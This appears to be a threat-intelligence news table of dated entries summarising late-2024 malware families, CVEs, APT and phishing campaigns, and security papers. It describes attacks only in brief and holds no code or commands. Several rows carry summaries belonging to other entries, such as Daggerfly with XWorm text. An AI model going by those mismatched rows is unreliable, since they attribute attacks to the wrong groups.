January(137) February(207) March(430) April(317) May(278) June(237) July(216) August(316) September(186) October(0) November(0) December(0) | BATTLEFIELD UKRAINE | i |
DATE | NAME | CATEGORY | SUBCATE | INFO |
21.12.24 | CookiePlus Malware | MALWARE | Backdoor | Lazarus Group Spotted Targeting Nuclear Engineers with CookiePlus Malware |
21.12.24 | 2024-12 Reference Advisory: Session Smart Router: Mirai malware found on systems when the default password remains unchanged | BOTNET | BOTNET | On Wednesday, December 11, 2024, several customers reported suspicious behavior on their Session Smart Network (SSN) platforms. These systems have been infected with the Mirai malware and were subsequently used as a DDOS attack source to other devices accessible by their network. The impacted systems were all using default passwords. |
21.12.24 | cShell DDoS Bot Attack | HACKING | HACKING | ASEC recently identified a new DDoS malware strain targeting Linux servers while monitoring numerous external attacks. The threat actor initially targeted poorly managed SSH services and ultimately installed a DDoS bot named cShell. cShell is developed in the Go language and is characterized by exploiting Linux tools called screen and hping3 to perform DDoS attacks. |
21.12.24 | CVE-2023-48788 | VULNEREBILITY | VULNEREBILITY | (CVSS score: 9.3) - Fortinet FortiClient EMS SQL Injection Vulnerability |
21.12.24 | CVE-2021-44529 | VULNEREBILITY | VULNEREBILITY | (CVSS score: 9.8) - Ivanti Endpoint Manager Cloud Service Appliance (EPM CSA) Code Injection Vulnerability |
21.12.24 | CVE-2019-7256 | VULNEREBILITY | VULNEREBILITY | (CVSS score: 10.0) - Nice Linear eMerge E3-Series OS Command Injection Vulnerability |
21.12.24 | CVE-2024-12356 | VULNEREBILITY | VULNEREBILITY | BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) Command Injection Vulnerability |
21.12.24 | CVE-2024-12727 | VULNEREBILITY | VULNEREBILITY | (CVSS score: 9.8) - A pre-auth SQL injection vulnerability in the email protection feature that could lead to remote code execution, if a specific configuration of Secure PDF eXchange (SPX) is enabled in combination with the firewall running in High Availability (HA) mode. |
21.12.24 | CVE-2024-12728 | VULNEREBILITY | VULNEREBILITY | (CVSS score: 9.8) - A weak credentials vulnerability arising from a suggested and non-random SSH login passphrase for High Availability (HA) cluster initialization that remains active even after the HA establishment process completed, thereby exposing an account with privileged access if SSH is enabled. |
21.12.24 | CVE-2024-12729 | VULNEREBILITY | VULNEREBILITY | (CVSS score: 8.8) - A post-auth code injection vulnerability in the User Portal that allows authenticated users to gain remote code execution. |
21.12.24 | CVE-2023-48782 | VULNEREBILITY | VULNEREBILITY | (CVSS score: 8.8), an authenticated command injection flaw that has also been fixed in FortiWLM 8.6.6, to obtain remote code execution in the context of root. |
21.12.24 | CVE-2023-34990 | VULNEREBILITY | VULNEREBILITY | [FortiWLM] Unauthenticated limited file read vulnerability |
18.12.24 | HubPhish | CAMPAIGN | Phishing | Effective Phishing Campaign Targeting European Companies and Organizations |
18.12.24 | CVE-2024-53677 | VULNEREBILITY | VULNEREBILITY | File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. |
18.12.24 | Earth Koshchei | APT | APT | Earth Koshchei Coopts Red Team Tools in Complex RDP Attacks |
18.12.24 | CVE-2024-12356 | VULNEREBILITY | VULNEREBILITY | A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user. |
18.12.24 | CryptoRom | SPAM | SPAM | Sha zhu pan scam uses AI chat tool to target iPhone and Android users |
18.12.24 | DarkGate | MALWARE | RAT | Vishing via Microsoft Teams Facilitates DarkGate Malware Intrusion |
18.12.24 | FLUX#CONSOLE | MALWARE | Backdoor | Analyzing FLUX#CONSOLE: Using Tax-Themed Lures, Threat Actors Exploit Windows Management Console to Deliver Backdoor Payloads |
1.11.24 | New variant of FakeCall Android malware | ALERTS | VIRUS | A new variant of the Android malware called FakeCall has been observed in the wild. The attackers behind this malware employ voice phishing (vishing) techniques in order to trick victims into disclosing sensitive information such as credentials or banking information. |
1.11.24 | Sauron - a new ransomware variant in the wild | ALERTS | RANSOM | Sauron is a new ransomware variant recently found in the wild. The malware appends ".sauron" extension to the encrypted files. The ransom note is dropped in form of a text file called "#HowToRecover.txt" on the affected machines. The attackers request to contact them via the provided email address and the ransom is demanded in form of Bitcoin cryptocurrency payment. |
1.11.24 | UNC5812 campaigns against Ukraine with Android and Windows malware | ALERTS | GROUP | A recent report highlighted activity attributed to a suspected Russian threat actor identified as UNC5812. The activity involved distributions of Android and Windows malware targeting Ukranian military recruits. The intent of the campaign was not only to engage in espionage but also attempt to negatively influence support for pro-Ukranian forces. |
1.11.24 | A possible Bumblebee Loader resurgence | ALERTS | VIRUS | A new campaign delivering the Bumblebee loader has been reported this month. Bumblebee is a highly sophisticated downloader variant discovered initially back in 2022. The malware has been spread across a multitude of malicious campaigns and used for the delivery and execution of miscellaneous payloads such as Cobalt Strike, ransomware, etc. |
1.11.24 | CVE-2024-40711 - Veeam Backup and Replication deserialization vulnerability exploited by ransomware actors | ALERTS | VULNEREBILITY | CVE-2024-40711 is a recently disclosed critical (CVSS score 9.8) deserialization vulnerability affecting the Veeam Backup and Replication software in version 12.1.2.172 or older. If successfully exploited the flaw might provide unauthenticated attackers with remote code execution (RCE) on the vulnerable systems. |
1.11.24 | Malicious "Lounge Pass" app targets air travelers in India | ALERTS | VIRUS | A campaign involving a malicious Android app called "Lounge Pass" targeting air travelers at Indian airports has been observed. Distributed through fake domains, the app intercepts and forwards SMS messages from victims' devices to cybercriminals, leading to significant financial losses. |
1.11.24 | Adware Campaign uses Fake CAPTCHA to deliver Lumma and Amadey malware | ALERTS | VIRUS | Threat actors are increasingly using fake CAPTCHA as an initial attack vector. A recent adware campaign is targeting online users by presenting them with fake CAPTCHA or update prompts. Attackers are leveraging ad networks to redirect victims to compromised sites that host these social engineering lures. |
1.11.24 | TeamTNT targets cloud-native environments in new Cryptojacking campaign | ALERTS | CRYPTOCURRENCY | A new campaign by the cryptojacking group TeamTNT has been reported targeting cloud-native environments for cryptocurrency mining and reselling compromised servers. They exploit exposed Docker daemons to deploy Sliver malware, cyber worms and cryptominers, gaining access through exposed Docker ports and using compromised Docker Hub accounts to spread malware and rent out victims' computational power. |
1.11.24 | Rekoobe malware found potentially targeting TradingView users | ALERTS | VIRUS | An open directory has been discovered hosting Rekoobe malware, potentially aimed at targeting TradingView users along with other cyber espionage campaigns. Rekoobe is a versatile backdoor previously deployed by APT31 and other adversaries engaged in cyber espionage and data theft. |
1.11.24 | Daggerfly targets Taiwanese entities with new CloudScout Toolset | ALERTS | APT | China-linked threat actor Daggerfly (also known as Evasive Panda) has been reported targeting a government entity and a religious organization in Taiwan with a previously undocumented post-compromise toolset called CloudScout. This toolset can retrieve data from various cloud services by leveraging stolen web session cookies. Additionally, CloudScout integrates seamlessly with MgBot, Evasive Panda's signature malware framework. |
1.11.24 | Daggerfly targets Taiwanese entities with new CloudScout Toolset | ALERTS | VIRUS | Researchers have recently uncovered a malicious campaign spreading the XWorm RAT trojan via fake emails posing as official communications from Namirial, a software and service company. The emails prompt users to open a password-protected PDF, and if it fails, directs them to a Dropbox link that downloads a ZIP file containing a URL that would connect to the attacker's servers and download additional malicious scripts, enabling control over the victim's machine. |
1.11.24 | Phishing Campaign Distributing XWorm RAT | ALERTS | PHISHING | Researchers have recently uncovered a malicious campaign spreading the XWorm RAT trojan via fake emails posing as official communications from Namirial, a software and service company. The emails prompt users to open a password-protected PDF, and if it fails, directs them to a Dropbox link that downloads a ZIP file containing a URL that would connect to the attacker's servers and download additional malicious scripts, enabling control over the victim's machine. |
1.11.24 | HeptaX Cyberattack Operations | ALERTS | OPERATION | A researcher recently identified a multi-stage cyberattack targeting the healthcare industry, initiated through a ZIP file containing a malicious shortcut (.lnk) file, likely spread via phishing emails. When executed, the LNK file runs a PowerShell command that downloads additional payloads including scripts and BAT files from a remote server. |
1.11.24 |
Update on the Recall preview feature | SECURITY | SECURITY | Even before making Recall available to customers, we have heard a clear signal that we can make it easier for people to choose to enable Recall on their Copilot+ PC and improve privacy and security safeguards. With that in mind we are announcing updates that will go into effect before Recall (preview) ships to customers on June 18. |
1.11.24 |
Xiū Gǒu Phishing Kit | PHISHING | PHISHING KIT | Every Doggo Has Its Day: Unleashing the Xiū Gǒu Phishing Kit |
1.11.24 |
LightSpy | MALWARE | iOS | In May 2024, ThreatFabric published a report about LightSpy for macOS. During that investigation, we discovered that the threat actor was using the same server for both macOS and iOS campaigns. |
1.11.24 |
Rare Case of Privilege Escalation Patched in LiteSpeed Cache Plugin | VULNEREBILITY | VULNEREBILITY | This blog post is about the LiteSpeed plugin vulnerability. If you’re a LiteSpeed user, please update the plugin to at least version 6.5.2. |
30.10.24 |
Jumpy Pisces Engages in Play Ransomware | RANSOMWARE | RANSOMWARE | Unit 42 has identified Jumpy Pisces, a North Korean state-sponsored threat group associated with the Reconnaissance General Bureau of the Korean People's Army, as a key player in a recent ransomware incident. |
30.10.24 |
CrossBarking | EXPLOIT | VULNEREBILITY | “CrossBarking” — Exploiting a 0-Day Opera Vulnerability with a Cross-Browser Extension Store Attack |
30.10.24 |
Rampant Phishing | CAMPAIGN | PHISHING | You’re Invited: Rampant Phishing Abuses Eventbrite |
30.10.24 |
CryptoAiToolsv0.7 | CRYPTOCURRENCY | CRYPTOCURRENCY | A Python toolkit to create and manage crypto trading bots |
29.10.24 |
CVE-2024-7474 | VULNEREBILITY | CVE | (CVSS score: 9.1) - An Insecure Direct Object Reference (IDOR) vulnerability that could allow an authenticated user to view or delete external users, resulting in unauthorized data access and potential data loss |
29.10.24 |
CVE-2024-7475 | VULNEREBILITY | CVE | (CVSS score: 9.1) - An improper access control vulnerability that allows an attacker to update the SAML configuration, thereby making it possible to log in as an unauthorized user and access sensitive information |
29.10.24 |
Operation Magnus | OPERATION | OPERATION | On the 28th of October 2024 the Dutch National Police, working in close cooperation with the FBI and other partners of the international law enforcement task force Operation Magnus, disrupted operation of the Redline and META infostealers. |
29.10.24 |
Breaking the Barrier: Post-Barrier Spectre Attac | PAPERS | PAPERS | The effectiveness of transient execution defenses rests on obscure model-specific operations that must be correctly implemented in microcode and applied by software. In this paper, we study branch predictor invalidation through. |
29.10.24 |
Breaking the Barrier | VULNEREBILITY | CPU | Speculation barriers, in this case barriers that stop previously learned predictions from being used, are critical for computer software and cloud infrastructure to run securely. |
29.10.24 |
CloudScout | APT | APT | ESET researchers discovered a previously undocumented toolset used by Evasive Panda to access and retrieve data from cloud services |
28.10.24 |
UNC5812 | GROUP | GROUP | Hybrid Russian Espionage and Influence Campaign Aims to Compromise Ukrainian Military Recruits and Deliver Anti-Mobilization Narratives |
28.10.24 |
BeaverTail | MALWARE | PYTHON | Tenacious Pungsan: A DPRK threat actor linked to Contagious Interview |
28.10.24 | CVE-2024-38202 | VULNEREBILITY | CVE | Windows Update Stack Elevation of Privilege Vulnerability Recently updated |
28.10.24 | VULNEREBILITY | CVE | Windows Secure Kernel Mode Elevation of Privilege Vulnerability | |
28.10.24 | Gun Campaign | CAMPAIGN | CAMPAIGN | TeamTNT’s Docker Gatling Gun Campaign |
28.10.24 | Qilin | RANSOMWARE | RANSOMWARE | New Qilin.B Ransomware Variant Boasts Enhanced Encryption and Defense Evasion |
28.10.24 | Multi-Turn Context Jailbreak Attack on Larg | PAPERS | PAPERS | Large language models (LLMs) have significantly enhanced the performance of numerous applications, from intelligent conversations to text generation. However, their inherent security vulnerabilities have become an increasingly significant challenge, especially with respect to jailbreak attacks. |
28.10.24 | CVE-2024-38094 | VULNEREBILITY | CVE | Microsoft SharePoint Remote Code Execution Vulnerability |
28.10.24 | CVE-2024-47575 | VULNEREBILITY | CVE | A missing authentication for critical function in FortiManager 7.6.0, FortiManager 7.4.0 through 7.4.4, FortiManager 7.2.0 through 7.2.7, FortiManager 7.0.0 through 7.0.12, FortiManager 6.4.0 through 6.4.14, FortiManager 6.2.0 through 6.2.12, Fortinet FortiManager Cloud 7.4.1 through 7.4.4, FortiManager Cloud 7.2.1 through 7.2.7, FortiManager Cloud 7.0.1 through 7.0.13, FortiManager Cloud 6.4.1 through 6.4.7 allows attacker to execute arbitrary code or commands via specially crafted requests. |
28.10.24 | Lazarus APT | APT | APT | The Crypto Game of Lazarus APT: Investors vs. Zero-days |
28.10.24 | CVE-2024-20481 | VULNEREBILITY | CVE | Cisco Adaptive Security Appliance and Firepower Threat Defense Software Remote Access VPN Brute Force Denial of Service Vulnerability |
28.10.24 | Grandoreiro | MALWARE | BANKING | Grandoreiro, the global trojan with grandiose goals |
28.10.24 | Using gRPC and HTTP/2 for Cryptominer Deployment: An Unconventional Approach | CRYPTOCURRENCY | CRYPTOCURRENCY | Trend Micro researchers recently observed a malicious actor targeting Docker remote API servers to deploy the SRBMiner cryptominer and mine XRP cryptocurrency. |
28.10.24 | CVE-2024-38812 | VULNEREBILITY | CVE | VMSA-2024-0019:VMware vCenter Server updates address heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) |
28.10.24 |
End-to-End Encrypted Cloud Storage in the Wild: A Broken Ecosyst | PAPERS | PAPERS | Cloud storage is ubiquitous: Google Drive, Dropbox, and OneDrive are household names. However, these services do not provide end-to-end encryption (E2EE), meaning that the provider has access to the data stored on their servers. The promise of end-to-end encrypted cloud storage is that users can have the best of both worlds, keeping control of their data using cryptographic techniques, while still benefiting from low-cost storage solutions. |
28.10.24 | Iranian Cyber Actors’ Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations | BIGBROTHER | BIGBROTHER | Iranian Cyber Actors’ Brute Force and Credential Access Activity Compromises Critical Infrastructure Organizations |
28.10.24 | ClickFix | CAMPAIGN | SOCIAL | ClickFix tactic: The Phantom Meet |
28.10.24 | Latrodectus | MALWARE | LOADER | Analyzing Latrodectus: The New Face of Malware Loaders |
28.10.24 | CVE-2024-8260 | VULNEREBILITY | CVE | A SMB force-authentication vulnerability exists in all versions of OPA for Windows prior to v0.68.0. The vulnerability exists because of improper input validation, allowing a user to pass an arbitrary SMB share instead of a Rego file as an argument to OPA CLI or to one of the OPA Go library’s functions. |
28.10.24 | Gophish Framework | PHISHING | CAMPAIGN | Threat actor abuses Gophish to deliver new PowerRAT and DCRAT |
28.10.24 | Crypt Ghouls | GROUP | GROUP | Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia |
28.10.24 | CVE-2024-37383 | VULNEREBILITY | CVE | Fake attachment. Roundcube mail server attacks exploit CVE-2024-37383 vulnerability. |
27.10.24 | CVE-2024-9487 | VULNEREBILITY | CVE | 3.14.2: Security fixes |
27.10.24 | Water Makara | GROUP | GROUP | Water Makara Uses Obfuscated JavaScript in Spear Phishing Campaign, Targets Brazil With Astaroth Malware |
27.10.24 | FASTCash | MALWARE | LINUX | Analysis of a newly discovered Linux based variant of the DPRK attributed FASTCash malware along with background information on payment switches used in financial networks. |
27.10.24 | TrickMo | MALWARE | BANKING | Expanding the Investigation: Deep Dive into Latest TrickMo Samples |
27.10.24 |
DarkVision RAT | MALWARE | RAT | DarkVision RAT is a highly customizable remote access trojan (RAT) that first surfaced in 2020, offered on Hack Forums and their website for as little as $60. Written in C/C++, and assembly, DarkVision RAT has gained popularity due to its affordability and extensive feature set, making it accessible even to low-skilled cybercriminals. |
27.10.24 |
CVE-2024-38178 | VULNEREBILITY | CVE | Scripting Engine Memory Corruption Vulnerability |
27.10.24 | OperationCodeonToast | OPERATION | OPERATION | AhnLab and NCSC Release Joint Report on Microsoft Zero-Day Browser Vulnerability (CVE-2024-38178) |
27.10.24 | EDRSilencer | TOOL | HACKING | Trend Micro's Threat Hunting Team has observed EDRSilencer, a red team tool that threat actors are attempting to abuse for its ability to block EDR traffic and conceal malicious activity. |
27.10.24 | CVE-2024-9486 | VULNEREBILITY | CVE | VM images built with Image Builder and Proxmox provider use default credentials in github.com/kubernetes-sigs/image-builder |
27.10.24 | SideWinder | APT | GROUP | Beyond the Surface: the evolution and expansion of the SideWinder APT group |
27.10.24 | Cicada3301 | RANSOMWARE | RANSOMWARE | Encrypted Symphony: Infiltrating the Cicada3301 Ransomware-as-a-Service Group |
27.10.24 | UAT-5647 | GROUP | APT | UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants |
27.10.24 | Multiple vulnerabilities affecting Palo Alto Networks Expedition | ALERTS | VULNEREBILITY | Multiple vulnerabilities affecting Palo Alto Networks Expedition have been disclosed this month. The reported flaws (CVE-2024-9463, CVE-2024-9464, CVE-2024-9465, CVE-2024-9466, CVE-2024-9467) have been rated between CVSS 7.0 and CVSS 9.9 and include a mix of command injection, cross-site scripting (XSS), cleartext storage of sensitive information, missing authentication, and SQL injection vulnerabilities. |
27.10.24 | CVE-2024-47575 - Fortinet FortiManager Missing Authentication vulnerability | ALERTS | VULNEREBILITY | CVE-2024-47575 is a Zero-day vulnerability affecting Fortinet FortiManager, that has been disclosed just this month. The vulnerability has been rated with a critical CVSS score of 9.8. If successfully exploited, it could allow remote unauthenticated attackers to execute arbitrary code via specially crafted requests. |
27.10.24 | Parano Stealer | ALERTS | VIRUS | Parano Stealer is another "run-of-the-mill" infostealer variant recently observed in the wild. This Python-based malware has functionality to collect and exfiltrate various information from the compromised endpoints, including: credentials, cookies, miscellaneous data stored in web browsers, cryptocurrency wallets, system information or data from various 3rd party applications like Steam, Telegram or Discord. |
27.10.24 | Liberium RAT malware | ALERTS | VIRUS | Liberium RAT (also known as ShadowRoot) is a malware variant recently advertised for sale on hacking forums. The malware has the capabilities allowing the attackers remote access to the vulnerable endpoints, file management operations, registry manipulation as well as theft of system related information and other confidential data. |
27.10.24 | CVE-2024-38094 - Microsoft SharePoint Deserialization vulnerability exploited in the wild | ALERTS | VULNEREBILITY | CVE-2024-38094 is a deserialization vulnerability affecting Microsoft SharePoint, which was initially disclosed and patched back in July 2024. The flaw rated with a CVSS score of 7.2 arises from the product deserializing data without enough verification that the resulting data output will be valid. |
27.10.24 | Prometei botnet activity | ALERTS | BOTNET | New Prometei botnet activity has been reported in the wild. The botnet has been historically used mostly for Monero cryptomining operations but with time the attackers behind it updated the botnet capabilities to conduct even more complex attacks, allowing for a full control over the infected machines a well as additional arbitrary payload deployments. |
27.10.24 | DarkComet Backdoor | ALERTS | VIRUS | DarkComet is a powerful Remote Access Trojan (RAT) that remains a significant threat because of its stealthy operations and comprehensive functionality. It enables attackers to remotely control infected devices, exfiltrate sensitive data, and deploy further malware. It can evade detection by altering file attributes, manipulating registry keys and escalating privileges. |
27.10.24 | Threat actors distribute WarmCookie malware via various campaigns | ALERTS | VIRUS | WarmCookie is malware that has been observed being distributed through various campaigns, including malicious emails. This malware provides initial access to a compromised victim and is used to establish persistence. Additional functionality associated with WarmCookie includes remote command execution, file system manipulation, and payload delivery, among others. |
27.10.24 | Crystal Rans0m: Rust-Based Hybrid Ransomware | ALERTS | RANSOM | Crystal Rans0m is a Rust-based hybrid ransomware that combines file encryption with data-stealing capabilities that has been observed targeting Italy and Russia. The malware can steal browser data, Discord tokens, Steam files, Riot Games data and utilizes Discord webhooks for data exfiltration. |
27.10.24 | CVE-2024-9680 - Mozilla Firefox Remote Code Execution vulnerability | ALERTS | VULNEREBILITY | CVE-2024-9680 is a recently disclosed Remote Code Execution (RCE) vulnerability affecting Mozilla Firefox and Thunderbird software. The vulnerability has been assigned a critical CVSS score of 9.8 and arises from a "use-after-free" flaw in the animation timeline component of the browser. |
27.10.24 | Phemedrone Stealer | ALERTS | VIRUS | Phemedrone is an open-source infostealer variant observed being distributed in the wild this year. The malware is written in C# and has the functionality to collect and exfiltrate various sensitive information such as login credentials, data stored in browsers, cookies, credit card information, cryptocurrency wallets, files stored in "My Documents" folders or data from other 3rd party apps such as Steam, Discord or Telegram. |
27.10.24 | Phemedrone Stealer | ALERTS | VIRUS | Earlier this year, Akira developed a new version of its ransomware encryptor and has since been observed using another novel iteration of the encryptor that targets both Windows and Linux systems. Akira typically employs a double-extortion tactic, exfiltrating critical data before encrypting the victim's systems. However, starting in early 2024, the group appears to be shifting away from encryption tactics, focusing solely on data exfiltration. |
27.10.24 | Akira Ransomware Evolution: A move towards cross-platform adaptability | ALERTS | RANSOM | Earlier this year, Akira developed a new version of its ransomware encryptor and has since been observed using another novel iteration of the encryptor that targets both Windows and Linux systems. Akira typically employs a double-extortion tactic, exfiltrating critical data before encrypting the victim's systems. However, starting in early 2024, the group appears to be shifting away from encryption tactics, focusing solely on data exfiltration. |
27.10.24 | Ghostpulse Malware: Shifting tactics from PNGs to Pixel values | ALERTS | VIRUS | According to recent reports, Ghostpulse malware has evolved its tactics by shifting from hiding its encrypted configuration and payload in the IDAT chunk of PNG files, to embedding it directly within the pixel values themselves to evade detection. In recent campaigns, attackers have employed social engineering techniques such as CAPTCHA validations to deceive users which ultimately triggers malicious commands via Windows keyboard shortcuts. |
27.10.24 | CVE-2024-28987 - SolarWinds Web Help Desk Hardcoded Credential vulnerability | ALERTS | VULNEREBILITY | CVE-2024-28987 is a recently disclosed hardcoded credential vulnerability affecting the SolarWinds Web Help Desk (WHD) software. The flaw is rated as critical (CVSS score 9.1 and if successfully exploited could allow remote unauthenticated attackers to access internal software functionality and modify data. |
27.10.24 | Threat actors abusing open-source phishing framework to deliver RATS | ALERTS | VIRUS | A recent report by (CTA) member Cisco Talos has recently disclosed a new phishing campaign abusing the open-source phishing readiness assessment framework named 'Gophish' to deploy one of two attack chains. The first uses Pidief infected Office docs to deploy a newly discovered PowerShell RAT dubbed 'PowerRAT' while the second employs malicious HTML files and GOLoader to deploy DCRAT. |
27.10.24 | IcePeony: China-linked APT group targeting Southeast Asian governments | ALERTS | APT | A recently identified APT group linked to China dubbed IcePeony has been detected conducting malware campaigns targeting government agencies and institutions in countries such as India, Mauritius, and Vietnam. The group's attack vector often involves SQL injection, leading to compromises via web shells and backdoors that utilize custom malware like "IceCache" to infiltrate networks. |
27.10.24 | Lumma Stealer delivered via Fake CAPTCHA | ALERTS | VIRUS | Researchers are monitoring an ongoing phishing campaign where attackers appear to have upped their tactics from traditional phishing to incorporating the use of fake CAPTCHA pages and exploiting legitimate software. The intention being to eventually lure users into executing a payload called Lumma Stealer. This infostealing malware is a MaaS (Malware-as-a-Service) variant that steals sensitive data such as passwords and cryptocurrency information. |
27.10.24 | Phishing Campaign Delivering Wiper Malware | ALERTS | PHISHING | A recent campaign was observed by researchers where threat actors were seen targeting Israeli organizations, by impersonating a certain antivirus vendor and sending out phishing emails warning of state-backed threats. The emails include a link to a fake program that downloads a malware called Wiper, designed to erase data. |
27.10.24 | Phishing attack aims at Meta Ads Professionals with Quasar RAT | ALERTS | PHISHING | A malware campaign targeting job seekers and digital marketing professionals has been reported. The campaign specifically focuses on Meta Ads professionals and is believed to be driven by a Vietnamese Threat Actor. The attack chain begins with a phishing email containing an archive attachment that disguises a malicious LNK file as a PDF. When opened, the LNK file triggers PowerShell commands that lead to the download and execution of additional scripts, ultimately resulting in the delivery of the Quasar RAT payload. |
27.10.24 | ClickFix Tactic: New malware campaigns preying on Google Meet users | ALERTS | CAMPAIGN | Various malware campaigns utilizing the emerging ClickFix tactic have been reported since June 2024. One such campaign distributing infostealers through fake Google Meet pages, a popular video communication service has been reported in the wild. Users are lured by emails that appear to be legitimate Google Meet invitations for work meetings, conferences, or other significant events. |
27.10.24 | Recent malicious activities attributed to the UAT-5647 threat group | ALERTS | GROUP | According to the report published by Cisco Talos, UAT-5647 threat group has been targeting entities in Ukraine and Poland in their most recent campaigns. The threat actors have been distributing two distinct downloader variants called RustyClaw and MeltingClaw, a new RomCom malware variant dubbed SingleCamper, as well as DustyHammock and ShadyHammock backdoors. |
27.10.24 | Emerging Stealer Variants: Divulge, DedSec, and Duck Stealers | ALERTS | VIRUS | Multiple stealers have been observed being advertised on hacker forums, GitHub, and Telegram, all developed and promoted by the same entity. Notable variants include Divulge Stealer (a copy of Umbral), DedSec Stealer (based on Doenerium), and Duck Stealer (a derivative of AZStealer). |
27.10.24 | TrickMo targeting Android users with fake lock-screen | ALERTS | VIRUS | Security researchers have recently disclosed a new variant of TrickMo, a mobile banking trojan that targets Android and iOS users. This new variant comes with some new functionality in addition to the existing capabilities, such as screen recording, remote control, and permissions granting. |
27.10.24 | Lockbit ransomware pretender targets macOS and Windows environments for data theft | ALERTS | RANSOM | A new campaign leveraging a malware variant disguised as Lockbit ransomware has been reported in the wild. The GO-based malware targets both macOS and Windows users in attempts to encrypt and exfiltrate confidential data. The stolen information is uploaded to Amazon AWS S3 buckets controlled by the attacks. The malware encrypts user files, deletes shadow copies on the infected machines and appends .abcd extension to the encrypted files. The ransomware then changes the desktop wallpaper to one copied over from Lockbit 2.0 attacks. This action is clearly a tactic meant to pressure the victims in paying the demanded ransom. |
27.10.24 | Microsoft Windows Kernel TOCTOU Race Condition Vulnerability (CVE-2024-30088) | ALERTS | VULNEREBILITY | CVE-2024-30088 is a Time-Of-Check Time-Of-Use (TOCTOU) race condition vulnerability in the Microsoft Windows Kernel. It arises when the state of a resource is modified between its validation (check) and actual use, allowing attackers to exploit the gap for privilege escalation. |
27.10.24 | Leafperforator APT group expands operations into the Middle East and Africa | ALERTS | APT | Researchers recently published a warning about the Telegram account '@reserveplusbot', linked to a specific application and serving as a contact for technical support. The suspicious messages urged users to install a ZIP file that contains malware. The executable file inside is a variant of Meduza Stealer, which steals files and evades detection by modifying Microsoft Defender settings. |
27.10.24 | Meduza Stealer | ALERTS | VIRUS | Researchers recently published a warning about the Telegram account '@reserveplusbot', linked to a specific application and serving as a contact for technical support. The suspicious messages urged users to install a ZIP file that contains malware. The executable file inside is a variant of Meduza Stealer, which steals files and evades detection by modifying Microsoft Defender settings. |
27.10.24 | New Linux variant of FASTCash malware discovered | ALERTS | VIRUS | A new Linux variant of the FASTCash malware (a tool which CISA has attributed to North Korea) has been discovered. FASTCash is malware that is implanted within compromised networks and leveraged to perform unauthorized banking transactions. |
27.10.24 | CVE-2024-44849 - Qualitor Remote Code Execution (RCE) vulnerability | ALERTS | VULNEREBILITY | CVE-2024-44849 is a critical (CVSS: 9.8) Remote Code Execution (RCE) vulnerability in Qualitor, which is a platform for managing customer service processes and centralizing services. This exploit allows remote code execution (RCE) through an arbitrary file upload in Qualitor version before 8.24. |
27.10.24 | ThunderKitty malware | ALERTS | VIRUS | ThunderKitty is a GO-based open-source infostealer variant seen in the wild. The malware has the functionality to collect miscellaneous information from infected machines including banking details, Discord session tokens, cookies, browser history and other data stored in the browsers, etc. ThunderKitty implements several evasion and anti-analysis techniques, VM environment and Debugger presence detection as well as persistence mechanisms. |
27.10.24 | CVE-2024-45519 - Remote Command Execution vulnerability in Zimbra Collaboration Suite | ALERTS | VULNEREBILITY | CVE-2024-45519 is a recently disclosed Remote Code Execution (RCE) vulnerability in Zimbra Collaboration Suite (ZCS) affecting versions before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1. The flaw stems from user input sanitation failure that if successfully exploited might allow the unauthenticated attackers to execute arbitrary code within the context of the vulnerable Zimbra installations. |
27.10.24 | INTERLOCK Ransomware | ALERTS | RANSOM | A new ransomware actor, going by the name INTERLOCK, has recently emerged in the threat landscape. This group appears to employ a double-extortion tactic. On successful compromise, encrypted files are appended with the ".interlock" extension. |
27.10.24 | Attackers still using SHTML files to target recipients with phishing | ALERTS | PHISHING | Symantec has recently observed a new phishing campaign using attached SHTML files disguised as import and or payment forms. The messages attempt to entice users to open the attached files to resolve import or billing issues. If the recipient opens the form they are greeted with a fake 'DHL' login page the exfiltrates the entered credentials to a private Telegram channel for the attacker to use later. |
27.10.24 | MiyaRat: The latest tool from the Bitter APT group | ALERTS | VIRUS | The Bitter APT group, recognized for its sophisticated cyber espionage activities targeting East and South Asia, has been observed deploying a new malware known as MiyaRat. This malware is capable of collecting system information, capturing screenshots, performing file uploads and downloads, and exfiltrating data to its command-and-control (C2) server, where it waits for further instructions. |
27.10.24 | CVE-2024-43363 - Cacti RCE vulnerability | ALERTS | VULNEREBILITY | CVE-2024-43363 is a remote code execution (RCE) vulnerability in Cacti, a network monitoring and fault management framework. Successful flaw exploitation happens via log poisoning on the vulnerable instances. This exploitation could ultimately allow the attackers for arbitrary command execution. The vulnerability has been fixed in product version 1.2.28 or higher. |
27.10.24 | Abuse of Code-Signing Certificates in Lumma Stealer deployment via HijackLoader | ALERTS | VIRUS | A malware campaign has been observed deploying Lumma Stealer using HijackLoader. The attack vector employs a "fake CAPTCHA" to lure users into executing a PowerShell payload that downloads a ZIP archive containing either a DLL or a signed HijackLoader binary. |
27.10.24 | CoreWarrior Malware | ALERTS | VIRUS | Researchers investigated a malware named CoreWarrior and found that this variant aggressively spreads by creating numerous copies, connecting to various IP addresses, opening multiple backdoor access points, and intercepting Windows UI elements for surveillance purposes. |
27.10.24 | Core Werewolf utilizes AutoIt loader and Telegram for Cyber attacks | ALERTS | VIRUS | The Core Werewolf threat actor group, which primarily targets Russia's defense industry and critical infrastructure, has been observed using new tools including an AutoIt loader and delivering malicious files via Telegram in addition to email. |
27.10.24 | ErrorFather Android Trojan | ALERTS | VIRUS | Cerberus Android banking trojan came to light in 2019, and this variant utilizes a multi-stage dropper to deploy its payload and can execute financial fraud through remote attacks, keylogging, and overlay tactics. The emergence of ErrorFather highlights the persistent danger of repurposed malware, as cybercriminals continue to exploit leaked source code years after the original Cerberus malware was discovered. |
27.10.24 | Demodex targeting American telecommunications | ALERTS | VIRUS | APT group 'Squash' has been reported to be utilizing Demodex to target American telecommunications providers. Demodex, a rootkit, is used to establish persistence and then files with fake file headers (PNG, JPEG and WAV have been observed) are used to help evade detection and utilized to establish C2 communications. |
